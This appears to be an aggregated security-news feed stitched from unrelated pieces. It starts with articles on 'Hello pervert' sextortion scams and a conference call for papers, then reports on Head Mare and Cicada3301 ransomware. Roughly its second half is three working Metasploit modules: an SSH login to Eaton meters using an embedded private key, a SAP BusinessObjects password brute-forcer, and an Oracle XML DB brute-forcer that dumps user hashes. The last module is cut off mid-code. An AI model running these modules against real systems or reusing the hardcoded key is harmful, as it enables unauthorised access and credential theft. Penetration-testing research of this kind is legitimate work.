" Hello pervert"  sextortion mails keep adding new features to their email to increase credibility and urge victims to pay

After using passwords obtained from one of the countless breaches as a lure to trick victims into paying, the “Hello pervert” sextortion scammers have recently introduced two new pressure tactics: Name-dropping the infamous Pegasus spyware and adding pictures of your home environment.

They do this to add credibility to the false claims that the scammers have been watching your online behavior and caught you red-handed during activities that you would like to keep private amongst your friends and family.

The email usually starts with “Hello pervert” and then goes on to claim that the target has been watching pornographic content. The scammers often claim to have footage of what you were watching and what you were doing while watching.

To stop the sender from spreading the incriminating footage, the target will have to pay the scammer, or else they will send it to everyone in their email contacts list.

More recently, scammers have started increasing their threats by mentioning a powerful spyware called “Pegasus.” Several versions of these scam emails have included the following text:

> Have you heard of Pegasus? This is a spyware program that installs on computers and smartphones and allows hackers to monitor the activity of device owners. It provides access to your webcam, messengers, emails, call records, etc. It works well on Android, iOS, and Windows.

Though Pegasus is indeed a powerfully invasive spyware tool, the threat of its use, as included in these scam emails, is entirely empty. This is because Pegasus has never been observed outside of a surveillance campaign carried out, specifically, by governments. Time and time again, Pegasus has been used by oppressive government regimes to spy on political dissidents, human rights activists, and watchdog journalists. There is essentially no proof that such a closely-guarded spyware has ended up in the hands of everyday scammers.

But the pressure tactics don’t end with Pegasus, as many of these emails include an old (or active) password that a scam target has used in the past. Here, this isn’t some act of advanced hacking. Instead, it is likely that the scammers bought your password from other cybercriminals that obtained them during one of the countless data breaches that hit company after company every week.

When scammers have access to such data, it may also include your physical address. With that knowledge, scammers have increased their threats by simply adding a photograph of your personal neighborhood by looking it up online. For most places in inhabited areas, you can grab such pictures from Google Maps or similar apps.

A Reddit user demonstrated this by finding that such a scammer used an old PO box address. But it’s true that this adds a convincing argument to the claim that the sender has been spying on you.  

As an extra threat the email may include something like:

> “Or is visiting \[your physical address\] a more convenient way to contact if you don’t take action. Nice location btw.”

Implying that they know where you live and threatening to stop by and create a scene.

**How to recognize “Hello pervert” emails**

Once you know what’s going on it’s easy to recognize these emails. Remember that not all of the below characteristics have to be included in these emails, but all of them are red flags in their own right.

*   They often look as if they came from one of your own email addresses.
*   The scammer accuses you of inappropriate behavior and claims to have footage of that behavior.
*   In the email the scammer claims to have used Pegasus or some Trojan to spy on you through your own computer.
*   The scammer says they know “your password.”
*   You are urged to pay up quickly or the so-called footage will be spread to all your contacts. Often you’re only allowed one day to pay.
*   The actual message often arrives as an image or a pdf attachment. Scammers do this to bypass phishing filters.

**How to react to “Hello pervert” emails**

First and foremost, never reply to emails of this kind. It may tell the sender that someone is reading the emails sent to that address and they will repeatedly try new and other methods to defraud you.

*   If the email included a password, make sure you are not using it any more and if you are, change it as soon as possible.
*   If you are having trouble organizing your password, have a look at a password manager.
*   Don’t let yourself get rushed into action or decisions. Scammers rely on the fact that you will not take the time to think this through and subsequently make mistakes.
*   Do not open unsolicited attachments. Especially when the sender address is suspicious or even your own.
*   For your ease of mind, turn of your webcam or buy a webcam cover so you can cover it when you’re not using the webcam.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 “Hello pervert” sextortion scam includes new threat of Pegasus—and a picture of your home 

An old but persistent email scam known as "sextortion" has a new personalized touch: The missives, which claim that malware has captured webcam footage of recipients pleasuring themselves, now include a photo of the target's home in a bid to make threats about publishing the videos more frightening and convincing.

An old but persistent email scam known as “**sextortion**” has a new personalized touch: The missives, which claim that malware has captured webcam footage of recipients pleasuring themselves, now include a photo of the target’s home in a bid to make threats about publishing the videos more frightening and convincing.

This week, several readers reported receiving sextortion emails that addressed them by name and included images of their street or front yard that were apparently lifted from an online mapping application such as **Google Maps**.

The message purports to have been sent from a hacker who’s compromised your computer and used your webcam to record a video of you while you were watching porn. The missive threatens to release the video to all of your contacts unless you pay a Bitcoin ransom. In this case, the demand is just shy of $2,000, payable by scanning a QR code embedded in the email.

Following a salutation that includes the recipient’s full name, the start of the message reads, “Is visiting \[recipient’s street address\] a more convenient way to contact if you don’t take action. Nice location btw.” Below that is the photo of the recipient’s street address.

A semi-redacted screenshot of a newish sextortion scam that includes a photo of the target’s front yard.

The message tells people they have 24 hours to pay up, or else their embarrassing videos will be released to all of their contacts, friends and family members.

“Don’t even think about replying to this, it’s pointless,” the message concludes. “I don’t make mistakes, \[recipient’s name\]. If I notice that you’ve shared or discussed this email with someone else, your shitty video will instantly start getting sent to your contacts.”

The remaining sections of the two-page sextortion message (which arrives as a PDF attachment) are fairly formulaic and include thematic elements seen in most previous sextortion waves. Those include claims that the extortionist has installed malware on your computer (in this case the scammer claims the spyware is called “Pegasus,” and that they are watching everything you do on your machine).

Previous innovations in sextortion customization involved sending emails that included at least one password they had previously used at an account online that was tied to their email address.

Sextortion — even semi-automated scams like this one with no actual physical leverage to backstop the extortion demand — is a serious crime that can lead to devastating consequences for victims. Sextortion occurs when someone threatens to distribute your private and sensitive material if you don’t provide them with images of a sexual nature, sexual favors, or money.

According to the FBI, here are some things you can do to avoid becoming a victim:

\-Never send compromising images of yourself to anyone, no matter who they are — or who they say they are.  
\-Don’t open attachments from people you don’t know, and be wary of opening attachments even from those you do know.  
\-Turn off \[and/or cover\] any web cameras when you are not using them.

The FBI says in many sextortion cases, the perpetrator is an adult pretending to be a teenager, and you are just one of the many victims being targeted by the same person. If you believe you’re a victim of sextortion, or know someone else who is, the FBI wants to hear from you: Contact your local FBI office (or toll-free at 1-800-CALL-FBI).

Sextortion Scams Now Include Photos of Your Home

The No cON Name 2024 call for papers has been announced. It will be held in Barcelona, Spain, from November 18th through the 20th, 2024.

    ************************************************  Call For Papers NcN 2k24 ***************************************************ph3ar disinformation and cognitive controlhttps://www.noconname.org/call-for-papers/Exact place not disclosed until a few weeks before due celebration.     * INTRODUCTIONThe organization has  opened CFP proposals. No cON Name is the eldest Hacking and Security Conference in Span. Our goal is to get highly qualified requests for both, speaker opportunities, as well as workshops, to show in  one of  the most  respected hacker conferences in   Barcelona and Spain, NcN (No cON Name). We will cellebrate as the last edition, 2 tracks:  * Privacy and net neutrality Track. (November 18th)  * Cybersecurity Track (November 19-20th)We will be accepting exclusively technical  presentations, proof of concept for, private  investigations  and  solutions  for  professionals   related  to the  IT security scene. Under no circumstance we will be selecting any proposal which is commercially targeted, our main goal is to share knowledge in a well-established community.     * FORMAT & REQUIREMENTS   - Language: English ( We will choose almost 75% ) or Spanish   - Proposal file type: PDF. It must follow  documentations requirements, shown     in next paragraph, and filled in through the web site.   - Please use the template provided for the presentations during the conference   - It's necessary to  deeply explain contents, as this document  will allow the     organization to evaluate the proposal.   - CFP's attachment  requested is mandatory. One page  summary of the contents,     or the investigations that you want to show will help to demonstrate techni-     cally the findings/result of investigations (additional texts, screenshots, evidences, code, etc)     WE DON'T ACCEPT PROPOSALS PRESENTED IN SPAIN BEFORE THE NOCONNAME'S CONGRESS DATE.In the event  that the  proposal  is accepted, it must be  submitted before the deadline (detailed in the important dates section below):   - An  article (a  template  in doc, odt  format  is  attached.) that will be delivered in the conferences notebook. MANDATORY   - Presentation and exhibition  material: All the material     that will be  presented to the organization  must be delivered, otherwise it will be possible to  grant other applicants your place. You have to plan the day of the event nimbly. MANDATORY     * CONTENTSWe will require the following info to review your CFP:DATA                         DESCRIPTIONPreferred contact method     Alias, email, X account, Telegram, Signaletc.  Name & Surname*  Alias *  Email *  Phone nº *  X, Telegram, Signal id  City/Country of residence *Proposal  Proposal type *             Speaking presentation or Workshop presentation  Representing *              Individual or company name  Category *                  See: RELEVANT TOPICS  Length (minutes) *          Speaker (presentation):Between 20 or 45            minutes.                              Workshop (presentation + demo):  45 minutes                              or 1,5 hours.  Title of the paper *:       Presentation's / Workshops Title  Goal*                      State  your objectives  during your investigation,                              issues encountered, impact on the society including                              risks.  Benefits*                  List  the   benefits  your   presentation                 will  be                              providing to the security community, social impact,                              and perhaps solutions to the current issue.  Description *               Presentation's / Workshop's description  Speaker's Biography *       Brief bio of latest published papers, previous talk                              experience, your current interests.     * RELEVANT TOPICSThe areas of interest that have been proposed, not restricted to, are:   - Offensive security.   - Evading / In-depth research of Phishing / Malware.   - Security & exploiting SCADA / ICS.   - Internet privacy and net neutrality (EPIC).   - Honeypots / Honeynets.   - Web explorers' security.   - Hardware hacking.   - New vulnerabilities and 0-day exploits.   - Healthcare sucurity / risks   - (in)Security in the automotive industry   - Software Testing/Fuzzing.   - Advanced Penetration testing techniques.   - Mobile Application Security-Threats and Exploits.   - Network and Router Hacking   - Mobile, Satellite, IP networks security   - SDR (Software defined radio)   - Hacking virtualized envirorments   - Computer/electronic forensics   - Bluetooth vulnerabilities.   - Videconference application vulnerabilities.     * DEADLINES   - CFP Requests closing: October 15th 2024.   - CFP Approval: October, 20th 2024.   - Materials presentation due: November, 1st  2024   - (Cybersecurity Track) Conference's date: November, 19th,20th 2024     * SENDING YOUR CFP   All requests must be submitted through our site at:   https://www.noconname.org/call-for-papers/   Fill in the form  and upload necessary files and you are  all set (some parts of website are in spanish)     - EVALUATION CRITERIA FOR PROPOSALSWe will be evaluating speaking  conference and workshop requests with the following score:   - Level  of  innovation  in  your  investigation / Sophistication  of the  40% presentation   - Stating your key-points of your proposal without going deep into detail 20%   - Briefing quality of your draft (proof of concept in  briefing is highly 15% appreciated)   - State field where your investigation  was made, ie:hardware, software, 10% industry.   - Your speaking reputation 10%   - Relevant topic proposed by the No cON Name staff 5%

No cON Name 2024 Call For Papers

A hacktivist group known as Head Mare has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus.
"Head Mare uses more up-to-date methods for obtaining initial access," Kaspersky said in a Monday analysis of the group's tactics and tools.
"For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which

A hacktivist group known as **Head Mare** has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus.

"Head Mare uses more up-to-date methods for obtaining initial access," Kaspersky said in a Monday analysis of the group's tactics and tools.

"For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which allows the attacker to execute arbitrary code on the system via a specially prepared archive. This approach allows the group to deliver and disguise the malicious payload more effectively."

Head Mare, active since 2023, is one of the hacktivist groups attacking Russian organizations in the context of the Russo-Ukrainian conflict that began a year before.

It also maintains a presence on X, where it has leaked sensitive information and internal documentation from victims. Targets of the group's attacks include governments, transportation, energy, manufacturing, and environment sectors.

Unlike other hacktivist personas that likely operate with an aim to inflict "maximum damage" to companies in the two countries, Head Mare also encrypts victims' devices using LockBit for Windows and Babuk for Linux (ESXi), and demands a ransom for data decryption.

Also part of its toolkit are PhantomDL and PhantomCore, the former of which is a Go-based backdoor that's capable of delivering additional payloads and uploading files of interest to a command-and-control (C2) server.

PhantomCore (aka PhantomRAT), a predecessor to PhantomDL, is a remote access trojan with similar features, allowing for downloading files from the C2 server, uploading files from a compromised host to the C2 server, as well as executing commands in the cmd.exe command line interpreter.

"The attackers create scheduled tasks and registry values named MicrosoftUpdateCore and MicrosoftUpdateCoree to disguise their activity as tasks related to Microsoft software," Kaspersky said.

"We also found that some LockBit samples used by the group had the following names: OneDrive.exe \[and\] VLC.exe. These samples were located in the C:\\ProgramData directory, disguising themselves as legitimate OneDrive and VLC applications."

Both the artifacts have been found to be distributed via phishing campaigns in the form of business documents with double extensions (e.g., решение №201-5\_10вэ\_001-24 к пив экран-сои-2.pdf.exe or тз на разработку.pdf.exe).

Another crucial component of its attack arsenal is Sliver, an open-source C2 framework, and a collection of various publicly available tools such as rsockstun, ngrok, and Mimikatz that facilitate discovery, lateral movement, and credential harvesting.

The intrusions culminate in the deployment of either LockBit or Babuk depending on the target environment, followed by dropping a ransom note that demands a payment in exchange for a decryptor to unlock the files.

"The tactics, methods, procedures, and tools used by the Head Mare group are generally similar to those of other groups associated with clusters targeting organizations in Russia and Belarus within the context of the Russo-Ukrainian conflict," the Russian cybersecurity vendor said.

"However, the group distinguishes itself by using custom-made malware such as PhantomDL and PhantomCore, as well as exploiting a relatively new vulnerability, CVE-2023-38831, to infiltrate the infrastructure of their victims in phishing campaigns."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hacktivists Exploits WinRAR Vulnerability in Attacks Against Russia and Belarus

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation.
"It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation.

"It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity company Morphisec said in a technical report shared with The Hacker News.

Written in Rust and capable of targeting both Windows and Linux/ESXi hosts, Cicada3301 first emerged in June 2024, inviting potential affiliates to join their ransomware-as-a-service (RaaS) platform via an advertisement on the RAMP underground forum.

A notable aspect of the ransomware is that the executable embeds the compromised user's credentials, which are then used to run PsExec, a legitimate tool that makes it possible to run programs remotely.

Cicada3301's similarities with BlackCat also extend to its use of ChaCha20 for encryption, fsutil to evaluate symbolic links and encrypt redirected files, as well as IISReset.exe to stop the IIS services and encrypt files that may otherwise be locked for for modification or deletion.

Other overlaps to BlackCat include steps undertaken to delete shadow copies, disable system recovery by manipulating the bcdedit utility, increase the MaxMpxCt value to support higher volumes of traffic (e.g., SMB PsExec requests), and clear all event logs by utilizing the wevtutil utility.

Cicada3301 has also observed stopping locally deployed virtual machines (VMs), a behavior previously adopted by the Megazord ransomware and the Yanluowang ransomware, and terminating various backup and recovery services and a hard-coded list of dozens of processes.

Besides maintaining a built-in list of excluded files and directories during the encryption process, the ransomware targets a total of 35 file extensions - sql, doc, rtf, xls, jpg, jpeg, psd, docm, xlsm, ods, ppsx, png, raw, dotx, xltx, pptx, ppsm, gif, bmp, dotm, xltm, pptm, odp, webp, pdf, odt, xlsb, ptox, mdf, tiff, docx, xlsx, xlam, potm, and txt.

Morphisec said its investigation also uncovered additional tools like EDRSandBlast that weaponize a vulnerable signed driver to bypass EDR detections, a technique also adopted by the BlackByte ransomware group in the past.

The findings follow Truesec's analysis of the ESXi version of Cicada3301, while also uncovering indications that the group may have teamed up with the operators of the Brutus botnet to obtain initial access to enterprise networks.

"Regardless of whether Cicada3301 is a rebrand of ALPHV, they have a ransomware written by the same developer as ALPHV, or they have just copied parts of ALPHV to make their own ransomware, the timeline suggests the demise of BlackCat and the emergence of first the Brutus botnet and then the Cicada3301 ransomware operation may possibly be all connected," the company noted.

The attacks against VMware ESXi systems also entail using intermittent encryption to encrypt files larger than a set threshold (100 MB) and a parameter named "no\_vm\_ss" to encrypt files without shutting down the virtual machines that are running on the host.

The emergence of Cicada3301 has also prompted an eponymous "non-political movement," which has dabbled in "mysterious" cryptographic puzzles, to issue a statement that it has no connection to the ransomware scheme.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Rust-Based Ransomware Cicada3301 Targets Windows and Linux Systems

Eaton Power Xpert Meters running firmware below version 12.x.x.x or below version 13.3.x.x ship with a public/private key pair that facilitate remote administrative access to the devices. Tested on: Firmware 12.1.9.1 and 13.3.2.10.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework#### XXX: This shouldn't be necessary but is nowrequire 'net/ssh'require 'net/ssh/command_stream'class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SSH  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::CommandShell  include Msf::Auxiliary::Report  include Msf::Sessions::CreateSessionOptions  include Msf::Auxiliary::ReportSummary  def initialize(info = {})    super(update_info(info,      'Name'           => 'Eaton Xpert Meter SSH Private Key Exposure Scanner',      'Description'    => %q{        Eaton Power Xpert Meters running firmware below version 12.x.x.x or        below version 13.3.x.x ship with a public/private key pair that        facilitate remote administrative access to the devices.        Tested on: Firmware 12.1.9.1 and 13.3.2.10.      },      'Author'         => [        'BrianWGray'      ],      'References'     => [        ['CVE', '2018-16158'],        ['EDB', '45283'],        ['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],        ['URL', 'https://www.ctrlu.net/vuln/0006.html']      ],      'DisclosureDate' => '2018-07-18',      'License'        => MSF_LICENSE    ))    register_options([      Opt::RPORT(22)    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  def run_host(ip)    # Specified Kex/Encryption downgrade requirements must be set to connect to the Power Meters.    ssh_opts = ssh_client_defaults.merge({      auth_methods:    ['publickey'],      port:            rport,      key_data:        [ key_data ],      hmac:            ['hmac-sha1'],      encryption:      ['aes128-cbc'],      kex:             ['diffie-hellman-group1-sha1'],      host_key:        ['ssh-rsa']    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(ip, 'admin', ssh_opts)      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    return unless ssh    print_good("#{ip}:#{rport} - Logged in as admin")    version = ssh.transport.server_version.version    report_vuln(      host: ip,      name: self.name,      refs: self.references,      info: version    )    shell = Net::SSH::CommandStream.new(ssh)    # XXX: Wait for CommandStream to log a channel request failure    sleep 0.1    if (e = shell.error)      print_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    info = "#{self.name} (#{version})"    ds_merge = {      'USERNAME' => 'admin'    }    if datastore['CreateSession']      start_session(self, info, ds_merge, false, shell.lsock)    end    # XXX: Ruby segfaults if we don't remove the SSH socket    remove_socket(ssh.transport.socket)  end  def rport    datastore['RPORT']  end  def key_data    <<EOF-----BEGIN RSA PRIVATE KEY-----MIICWwIBAAKBgQCfwugh3Y3mLbxw0q4RZZ5rfK3Qj8t1P81E6sXjhZl7C3FyH4MjC15CEzWovoQpRKrPdDaB5fVyuk6w2fKHrvHLmU2jTzq79B7A4JJEBQatAJeoVDglTyfL+q6BYAtAeNsho8eP/fMwrT2vhylNJ4BTsJbmdDJMoaaHu/0IB9Z9ywIBIwKBgQCEX6plM+qaJeVHif3xKFAP6vZq+s0mopQjKO0bmpUczveZEsu983n8O81f7lA/c2j1CITvSYI6fRyhKZ0RVnCRcaQ8h/grzZNdyyD3FcqDNKO7Xf+bvYySrQXhLeQPI3jXGQPfBZUicGPcJclA98SBdBI1SReAUls1ZdzDwA3T8wJBAM6j1N3tYhdqal2WgA1/WSQrFxTt28mFeUC8enGvKLRm1Nnxk/np9qy2L58BvZzCGyHAsZyVZ7Sqtfb3YzqKMzUCQQDF7GrnrxNXWsIAli/UZscqIovN2ABRa2y8/JYPQAV/KRQ44vet2aaBtrQBK9czk0QLlBfXrKsofBW81+Swiwz/AkEAh8q/FX68zY8Ssod4uGmg+oK3ZYZdO0kVKop8WVXY65QIN3LdlZm/W42qQ+szdaQgdUQc8d6F+mGNhQj4EIaz7wJAYCJfz54t9zq2AEjyqP64gi4JY/szWr8mL+hmJKoRTGRo6G49yXhYMGAOSbY1U5CsBZ+zzyf7XM6ONycIrYVeFQJABB8eqx/R/6Zwi8mVKMAF8lZXZB2dB+UOU12OGgvAHCKh7izYQtGEgPDbklbvEZ31F7H2o337V6FkXQMFyQQdHA==-----END RSA PRIVATE KEY-----EOF  endend

Eaton Xpert Meter SSH Private Key Exposure Scanner

This Metasploit module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::AuthBrute  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'       => 'SAP BusinessObjects Web User Bruteforcer',      'Description'  => 'This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.',      'References'  =>        [          # General          [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ]        ],      'Author'     => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],      'License'    => MSF_LICENSE    )    register_options(      [        Opt::RPORT(6405),      ])    register_autofilter_ports([ 6405 ])  end  def run_host(ip)    res = send_request_cgi({      'uri'   => "/PlatformServices/service/app/logon.object",      'method'  => 'GET'    }, 25)    return if not res    each_user_pass { |user, pass|      enum_user(user,pass)    }  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      last_attempted_at: Time.now,      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def enum_user(user, pass)    vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' password: '#{pass}'")    success = false    data = 'isFromLogonPage=true&cms=127.0.1%3A6400'    data << "&username=#{Rex::Text.uri_encode(user.to_s)}"    data << "&password=#{Rex::Text.uri_encode(pass.to_s)}"    data << '&authType=secEnterprise&backUrl=%2FApp%2Fhome.faces'    begin      res = send_request_cgi({        'uri'      => '/PlatformServices/service/app/logon.object',        'data'     => data,        'method'     => 'POST',        'headers'    =>              {                'Connection' => "keep-alive",                'Accept-Encoding' => "gzip,deflate",              },      }, 45)      return :abort if (!res or (res and res.code != 200))      if(res.body.match(/Account Information/i))        success = false      else        success = true        success      end    rescue ::Rex::ConnectionError      vprint_error("[SAP BusinessObjects] Unable to attempt authentication")      return :abort    end    if success      print_good("[SAP BusinessObjects] Successful login '#{user}' password: '#{pass}'")      report_cred(        ip: rhost,        port: rport,        service_name: 'sap-businessobjects',        user: user,        password: pass,        proof: res.body      )      return :next_user    else      vprint_error("[SAP BusinessObjects] failed to login as '#{user}' password: '#{pass}'")      return    end  endend

SAP BusinessObjects Web User Bruteforcer

This Metasploit module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigans default oracle password list.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'        => 'Oracle XML DB SID Discovery via Brute Force',      'Description' => %q{          This module attempts to retrieve the sid from the Oracle XML DB httpd server,          utilizing Pete Finnigan's default oracle password list.      },      'References'  =>        [          [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ],          [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv'],        ],      'Author'      => [ 'nebulus' ],      'License'     => MSF_LICENSE    )    register_options(        [          OptString.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]),          Opt::RPORT(8080),        ])  end  def run_host(ip)    begin    res = send_request_raw({      'uri'     => '/oradb/PUBLIC/GLOBAL_NAME',      'version' => '1.0',      'method'  => 'GET'    }, 5)    return if not res    if(res.code == 200)      vprint_status("http://#{ip}:#{datastore['RPORT']}/oradb/PUBLIC/GLOBAL_NAME (#{res.code}) is not password protected.")      return    elsif(res.code == 403 || res.code == 401)      print_status("http://#{ip}:#{datastore['RPORT']}/oradb/PUBLIC/GLOBAL_NAME (#{res.code})")    end    list = datastore['CSVFILE']    users = []    fd = CSV.foreach(list) do |brute|      dbuser = brute[2].downcase      dbpass = brute[3].downcase      user_pass = "#{dbuser}:#{dbpass}"      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/GLOBAL_NAME',        'version' => '1.0',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, 10)      if( not res )        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...")        next      end      if (res.code == 200)        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        sid = res.body.scan(/<GLOBAL_NAME>(\S+)<\/GLOBAL_NAME>/)[0]        report_note(          :host => ip,          :proto  => 'tcp',          :port => datastore['RPORT'],          :type => 'SERVICE_NAME',          :data => sid,          :update => :unique_data        )        print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}")        users.push(user_pass)      else        vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...")      end    end #fd.each    good = false    users.each do |user_pass|      (u,p) = user_pass.split(':')      # get versions      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/PRODUCT_COMPONENT_VERSION',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc = REXML::Document.new(res.body)          print_good("Version Information ==> as #{u}")          doc.elements.each('PRODUCT_COMPONENT_VERSION/ROW') do |e|            p = e.elements['PRODUCT'].get_text            v = e.elements['VERSION'].get_text            s = e.elements['STATUS'].get_text            report_note(              :host => datastore['RHOST'],              :sname => 'xdb',              :proto => 'tcp',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Component Version: #{p}#{v}",              :update => :unique_data            )            print_good("\t#{p}\t\t#{v}\t(#{s})")          end        end      end      # More version information      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/ALL_REGISTRY_BANNERS',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc = REXML::Document.new(res.body)          doc.elements.each('ALL_REGISTRY_BANNERS/ROW') do |e|            next if e.elements['BANNER'] == nil            b = e.elements['BANNER'].get_text            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Component Version: #{b}",              :update => :unique_data            )            print_good("\t#{b}")          end        end      end      # database links      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/ALL_DB_LINKS',        'version' => '1.1',        'method'  => 'GET',        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if(res)        if(res.code == 200)          if (not res.body.length > 0)          # sometimes weird bug where body doesn't have value yet            res.body = res.bufq          end          doc = REXML::Document.new(res.body)          print_good("Database Link Information ==> as #{u}")          doc.elements.each('ALL_DB_LINKS/ROW') do |e|            next if(e.elements['HOST'] == nil or e.elements['USERNAME'] == nil or e.elements['DB_LINK'] == nil)            h = e.elements['HOST'].get_text            d = e.elements['DB_LINK'].get_text            us = e.elements['USERNAME'].get_text            sid = h.to_s.scan(/$SID\s\=\s(\S+)$\)\)/)[0]            if(h.to_s.match(/^$DESCRIPTION/) )              h = h.to_s.scan(/\(HOST\s\=\s(\S+)$\(/)[0]            end            if(sid and sid != "")              print_good("\tLink: #{d}\t#{us}\@#{h[0]}/#{sid[0]}")              report_note(                :host => h[0],                :proto => 'tcp',                :port => datastore['RPORT'],                :sname => 'xdb',                :type => 'oracle_sid',                :data => sid,                :update => :unique_data              )            else              print_good("\tLink: #{d}\t#{us}\@#{h}")            end          end        end      end      # get users      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/DBA_USERS',        'version' => '1.1',        'method'  => 'GET',        'read_max_data' => (1024*1024*10),        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if res and res.code == 200        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        doc = REXML::Document.new(res.body)        print_good("Username/Hashes on #{ip}:#{datastore['RPORT']} ==> as #{u}")        doc.elements.each('DBA_USERS/ROW') do |user|          us = user.elements['USERNAME'].get_text          h = user.elements['PASSWORD'].get_text          as = user.elements['ACCOUNT_STATUS'].get_text          print_good("\t#{us}:#{h}:#{as}")          good = true          if(as.to_s == "OPEN")            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Active Account #{u}:#{h}:#{as}",              :update => :unique_data            )          else            report_note(              :host => datastore['RHOST'],              :proto => 'tcp',              :sname => 'xdb',              :port => datastore['RPORT'],              :type => 'ORA_ENUM',              :data => "Disabled Account #{u}:#{h}:#{as}",              :update => :unique_data            )          end        end      end      # get password information      res = send_request_raw({        'uri'     => '/oradb/PUBLIC/USER_PASSWORD_LIMITS',        'version' => '1.1',        'method'  => 'GET',        'read_max_data' => (1024*1024*10),        'headers' =>        {          'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"        }      }, -1)      if res and res.code == 200        if (not res.body.length > 0)        # sometimes weird bug where body doesn't have value yet          res.body = res.bufq        end        doc = REXML::Document.new(res.body)        print_good("Password Policy ==> as #{u}")        fla=plit=pgt=prt=prm=plot=''        doc.elements.each('USER_PASSWORD_LIMITS/ROW') do |e|          next if e.elements['RESOURCE_NAME'] == nil          case            when(e.elements['RESOURCE_NAME'].get_text == 'FAILED_LOGIN_ATTEMPTS')              fla = 